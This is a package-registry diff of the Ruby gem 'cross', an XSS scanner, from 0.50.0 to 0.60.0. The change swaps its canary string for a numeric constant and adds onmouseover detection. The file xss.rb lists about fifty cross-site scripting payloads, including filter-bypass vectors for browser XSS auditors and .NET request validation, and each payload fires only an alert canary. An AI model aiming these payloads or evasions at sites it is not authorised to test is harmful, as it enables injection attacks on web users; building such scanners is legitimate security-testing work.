cross 0.50.0 → 0.60.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (5) hide show
  1. checksums.yaml +4 -4
  2. data/lib/cross/engine.rb +9 -5
  3. data/lib/cross/version.rb +1 -1
  4. data/lib/cross/xss.rb +61 -59
  5. metadata +1 -1
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: 72b79605b86769c7845420cf772fe7e5ca4251c9
4
- data.tar.gz: de0ec4524597cd129cd1957bdca99587b743f0fa
3
+ metadata.gz: 4f1bec8b1ce4f2e496fe86f5d966efb87696b4e9
4
+ data.tar.gz: 8953c2f3a406c7a3cedbeb6f09395e2ddd7e5c11
5
5
  SHA512:
6
- metadata.gz: 4164f2710605496b67199f45f03f4b680c3926909f949b825f16b6a799534afca8c56496275c1d5f5e9a80139268ca0e90e2d189367981c14c64920732441c29
7
- data.tar.gz: 8cec8b9fb129209cdf5266b5e046bff9265f06aec82c68dc00c8bb0727a259ca2715bfbfd94790d62356d160ed347efa9a3ee44ff30aeb0f13a2efce9726ec36
6
+ metadata.gz: acb82a8dbe95bf8c952f2537d03642ec4f6d059202914d93f8509605beb208bf6088fdca447d84934f5d61446b7ad4e8f9b3442ed213091685abade5879c006e
7
+ data.tar.gz: a159b734f9bb303170e2e922c936c4c89abfe83524f58f2392bee7e0b2e679813c8371d5c01edd46faa615b39e26f4e94cb7b020aa73e0eeba7ac0d1954b8cb6
data/lib/cross/engine.rb CHANGED
@@ -75,8 +75,8 @@ module Cross
75
75
 
76
76
  scripts = page.search("//script")
77
77
  scripts.each do |sc|
78
- $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert('cross canary')")
79
- return true if sc.children.text.include?("alert('cross canary')")
78
+ $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
79
+ return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
80
80
  end
81
81
 
82
82
  return false if options[:oneshot]
@@ -115,8 +115,6 @@ module Cross
115
115
  ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
116
116
  ff.value = pattern if ff.name==options[:parameter_to_tamper]
117
117
 
118
-
119
- # promo=Promo1&codice=&nome=&cognome=&indirizzo=%3Cscript%3Ealert%28%27cross+canary%27%29%3C%2Fscript%3E&comune=&CAP=&provincia=&num1=&num2=&mail=&codfisc=&fase=1
120
118
  end
121
119
  end
122
120
 
@@ -126,7 +124,13 @@ module Cross
126
124
  $logger.err "Page is empty" if pp.body.empty?
127
125
  scripts = pp.search("//script")
128
126
  scripts.each do |sc|
129
- return true if sc.children.text.include?("alert('cross canary')")
127
+ return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
128
+ end
129
+
130
+ # This is for input html field javascript event evasion
131
+ inputs = pp.search("//input")
132
+ inputs.each do |input|
133
+ return true if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
130
134
  end
131
135
  end
132
136
  return false if options[:oneshot]
data/lib/cross/version.rb CHANGED
@@ -1,3 +1,3 @@
1
1
  module Cross
2
- VERSION = "0.50.0"
2
+ VERSION = "0.60.0"
3
3
  end
data/lib/cross/xss.rb CHANGED
@@ -2,69 +2,71 @@ module Cross
2
2
  module Attack
3
3
  class XSS
4
4
 
5
+ CANARY = 666
6
+
5
7
  def self.each
6
8
 
7
9
  evasions = [
8
- "<script>alert('cross canary')</script>",
9
- "<script>alert('cross canary');</script>",
10
- "/--><script>alert('cross canary')</script>",
11
- "/--><script>alert('cross canary');</script>",
12
- "/--></ScRiPt><ScRiPt>alert('cross canary')</ScRiPt>",
13
- "/--></ScRiPt><ScRiPt>alert('cross canary');</ScRiPt>",
14
- "//;-->alert('cross canary')",
15
- "//;-->alert('cross canary');",
16
- "\"//;\nalert('cross canary')",
17
- "\"//;\nalert('cross canary');",
18
- " onmouseover=alert('1');",
10
+ "a onmouseover=alert(#{Cross::Attack::XSS::CANARY})",
11
+ "<script>alert(#{Cross::Attack::XSS::CANARY})</script>",
12
+ "<script>alert(#{Cross::Attack::XSS::CANARY});</script>",
13
+ "/--><script>alert(#{Cross::Attack::XSS::CANARY})</script>",
14
+ "/--><script>alert(#{Cross::Attack::XSS::CANARY});</script>",
15
+ "/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY})</ScRiPt>",
16
+ "/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY});</ScRiPt>",
17
+ "//;-->alert(#{Cross::Attack::XSS::CANARY})",
18
+ "//;-->alert(#{Cross::Attack::XSS::CANARY});",
19
+ "\"//;\nalert(#{Cross::Attack::XSS::CANARY})",
20
+ "\"//;\nalert(#{Cross::Attack::XSS::CANARY});",
19
21
  # more exotic vectors (antisnatchor's collection)
20
- "<script/anyjunk>alert('cross canary')</script>",
21
- "<<script>alert('cross canary');//<</script>",
22
- "<img onerror=alert('cross canary') src=a>",
23
- "<xml onreadystatechange=alert('cross canary')>",
24
- "<style onreadystatechange=alert('cross canary')>",
25
- "<iframe onreadystatechange=alert('cross canary')>",
26
- "<object onerror=alert('cross canary')>",
27
- "<object type=image src=/images/live.gif onreadystatechange=alert('cross canary')></object>",
28
- "<img type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
29
- "<input type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
30
- "<isindex type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
31
- "<script onreadystatechange=alert('cross canary')>",
32
- "<bgsound onpropertychange=alert('cross canary')>",
33
- "<body onbeforeactivate=alert('cross canary')>",
34
- "<body onfocusin=alert('cross canary')>",
35
- "<input autofocus onfocus=alert('cross canary')>",
36
- "<input onblur=alert('cross canary') autofocus><input autofocus>",
37
- "<body onscroll=alert('cross canary')><br><br>...<br><input autofocus>",
38
- "</a onmousemove=alert('cross canary')>",
39
- "<video src=1 onerror=alert('cross canary')>",
40
- "<audio src=1 onerror=alert('cross canary')>",
41
- "<object data=javascript:alert('cross canary')>",
42
- "<iframe src=javascript:alert('cross canary')>",
43
- "<embed src=javascript:alert('cross canary')>",
44
- "<form id=test /><button form=test formaction=javascript:alert('cross canary')>",
45
- "<event-source src=javascript:alert('cross canary')>",
46
- "<x style=behavior:url(#default#time2) onbegin=alert('cross canary')>",
47
- "<x style=x:expression(alert('cross canary'))>",
48
- "<x onclick=alert('cross canary') src=a>Click here</x>",
49
- "<img onerror=\"alert('cross canary')\"src=a>",
50
- "<img onerror=`alert('cross canary')`src=a>",
51
- "<img/onerror=\"alert('cross canary')\"src=a>",
52
- "<img onerror=a&#x6c;ert('cross canary') src=a>",
53
- "<img onerror=a&#x06c;ert('cross canary') src=a>",
54
- "<img onerror=a&#x006c;ert('cross canary') src=a>",
55
- "<img onerror=a&#x0006c;ert('cross canary') src=a>",
56
- "<img onerror=a&#108;ert('cross canary') src=a>",
57
- "<img onerror=a&#0108;ert('cross canary') src=a>",
58
- "<img onerror=a&#0108;ert('cross canary') src=a>",
59
- "<img onerror=a&#108ert('cross canary') src=a>",
60
- "<img onerror=a&#0108ert('cross canary') src=a>",
61
- "<script>function::['alert']('cross canary')</script>",
62
- "<svg><script>//&#x0A;alert('cross canary')</script>", #Chrome <= 18 XssAuditor bypass
63
- "<script>/*///*/alert('cross canary');</script>", #Chrome <= 20 XssAuditor bypass
64
- "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('cross canary'))>", #.NET RequestValidator bypass
65
- "+ADw-script+AD4-alert('cross canary')+ADw-/script+AD4-", # UTF-7
66
- "},alert('cross canary'),function x(){//", # DOM breaker
67
- "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert('cross canary')\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
22
+ "<script/anyjunk>alert(#{Cross::Attack::XSS::CANARY})</script>",
23
+ "<<script>alert(#{Cross::Attack::XSS::CANARY});//<</script>",
24
+ "<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
25
+ "<xml onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
26
+ "<style onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
27
+ "<iframe onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
28
+ "<object onerror=alert(#{Cross::Attack::XSS::CANARY})>",
29
+ "<object type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})></object>",
30
+ "<img type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
31
+ "<input type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
32
+ "<isindex type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
33
+ "<script onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
34
+ "<bgsound onpropertychange=alert(#{Cross::Attack::XSS::CANARY})>",
35
+ "<body onbeforeactivate=alert(#{Cross::Attack::XSS::CANARY})>",
36
+ "<body onfocusin=alert(#{Cross::Attack::XSS::CANARY})>",
37
+ "<input autofocus onfocus=alert(#{Cross::Attack::XSS::CANARY})>",
38
+ "<input onblur=alert(#{Cross::Attack::XSS::CANARY}) autofocus><input autofocus>",
39
+ "<body onscroll=alert(#{Cross::Attack::XSS::CANARY})><br><br>...<br><input autofocus>",
40
+ "</a onmousemove=alert(#{Cross::Attack::XSS::CANARY})>",
41
+ "<video src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
42
+ "<audio src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
43
+ "<object data=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
44
+ "<iframe src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
45
+ "<embed src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
46
+ "<form id=test /><button form=test formaction=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
47
+ "<event-source src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
48
+ "<x style=behavior:url(#default#time2) onbegin=alert(#{Cross::Attack::XSS::CANARY})>",
49
+ "<x style=x:expression(alert(#{Cross::Attack::XSS::CANARY}))>",
50
+ "<x onclick=alert(#{Cross::Attack::XSS::CANARY}) src=a>Click here</x>",
51
+ "<img onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
52
+ "<img onerror=`alert(#{Cross::Attack::XSS::CANARY})`src=a>",
53
+ "<img/onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
54
+ "<img onerror=a&#x6c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
55
+ "<img onerror=a&#x06c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
56
+ "<img onerror=a&#x006c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
57
+ "<img onerror=a&#x0006c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
58
+ "<img onerror=a&#108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
59
+ "<img onerror=a&#0108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
60
+ "<img onerror=a&#0108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
61
+ "<img onerror=a&#108ert(#{Cross::Attack::XSS::CANARY}) src=a>",
62
+ "<img onerror=a&#0108ert(#{Cross::Attack::XSS::CANARY}) src=a>",
63
+ "<script>function::['alert'](#{Cross::Attack::XSS::CANARY})</script>",
64
+ "<svg><script>//&#x0A;alert(#{Cross::Attack::XSS::CANARY})</script>", #Chrome <= 18 XssAuditor bypass
65
+ "<script>/*///*/alert(#{Cross::Attack::XSS::CANARY});</script>", #Chrome <= 20 XssAuditor bypass
66
+ "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(#{Cross::Attack::XSS::CANARY}))>", #.NET RequestValidator bypass
67
+ "+ADw-script+AD4-alert(#{Cross::Attack::XSS::CANARY})+ADw-/script+AD4-", # UTF-7
68
+ "},alert(#{Cross::Attack::XSS::CANARY}),function x(){//", # DOM breaker
69
+ "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(#{Cross::Attack::XSS::CANARY})\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
68
70
  ]
69
71
  evasions.each do |pattern|
70
72
  yield pattern if block_given?
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: cross
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.50.0
4
+ version: 0.60.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - Paolo Perego